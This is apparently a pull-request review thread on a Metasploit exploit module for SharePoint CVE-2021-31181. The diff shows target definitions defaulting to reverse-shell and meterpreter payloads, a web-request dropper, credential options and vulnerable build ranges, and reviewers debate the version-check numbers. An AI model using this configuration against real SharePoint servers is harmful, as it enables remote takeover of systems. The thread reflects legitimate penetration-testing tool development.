modules/exploits/windows/http/sharepoint_unsafe_control.rb

```diff
@@ -0,0 +1,249 @@
+          [ 'CVE', '2021-31181' ],
+          [ 'URL', 'https://www.zerodayinitiative.com/blog/2021/6/1/cve-2021-31181-microsoft-sharepoint-webpart-interpretation-conflict-remote-code-execution-vulnerability' ]
+        ],
+        'DisclosureDate' => '2021-06-02', # Public disclosure via the ZDI blog (see the references)
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,
+                'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'
+              }
+            }
+          ],
+          [
+            'PowerShell Stager',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :psh_stager,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 2,
+        'DefaultOptions' => {
+          'DotNetGadgetChain' => :TypeConfuseDelegate
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('VALIDATION_KEY', [false, 'ViewState validation key']),
+      OptString.new('COOKIE', [false, 'SharePoint cookie if you have one']),
+      OptString.new('SP_LIST', [true, 'SharePoint site SPList', 'Documents']),
+      # "Promote" these advanced options so we don't have to pass around our own
+      OptString.new('HttpUsername', [false, 'SharePoint username']),
+      OptString.new('HttpPassword', [false, 'SharePoint password'])
+    ])
+  end
+
+  def post_auth?
+    true
+  end
+
+  def username
+    datastore['HttpUsername']
+  end
+
+  def password
+    datastore['HttpPassword']
+  end
+
+  def cookie
+    datastore['COOKIE']
+  end
+
+  def vuln_builds
+    # https://docs.microsoft.com/en-us/officeupdates/sharepoint-updates
+    # https://buildnumbers.wordpress.com/sharepoint/
+    # Patched in May of 2021
+    [
+      [Rex::Version.new('15.0.0.0'), Rex::Version.new('15.0.0.5337')], # SharePoint 2013
+      [Rex::Version.new('16.0.0.0'), Rex::Version.new('16.0.0.5149')], # SharePoint 2016
+      [Rex::Version.new('16.0.0.10000'), Rex::Version.new('16.0.0.10373')] # SharePoint 2019
```

Comment:
This doesn't make any sense. Your version numbers don't seem to match up with any of the version numbers listed on either of these sites.

If anything this is what I see as the proper version numbers given the information from Microsoft's site:

```suggestion
      [Rex::Version.new('15.0.0.0'), Rex::Version.new('15.0.5345.1000')], # SharePoint 2013
      [Rex::Version.new('16.0.0.0'), Rex::Version.new('16.0.5161.1000')], # SharePoint 2016
      [Rex::Version.new('16.0.10000.0'), Rex::Version.new('16.0.10374.20000')] # SharePoint 2019
```

Reply:
The version number that is pulled out of the header is not the exact same as what's published on that page from Microsoft. You'll notice in the output from the exploit:
```
[+] The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
```

This was from a SharePoint 2019 instance running on Server 2016. This suggestion would break the check due to how there's an additional `.0` in the value returned in the header. Additionally since this was patched in May of 2021, the last vulnerable version was the patch from April 2021.

* `16.0.10373.20000` SharePoint 2019
* `16.0.5149.1000` SharePoint 2016
* `15.0.5337.1000` SharePoint 2013

The values in the original code are correct because of how Ruby's `#between?` method is inclusive. For example:

```
2.between?(1, 2)
```

Reply:
"This suggestion would break the check due to how there's an additional .0 in the value returned in the header." <- This is what I was trying to identify, as otherwise on first glance it would appear this would need to match the values on the Microsoft page you linked to.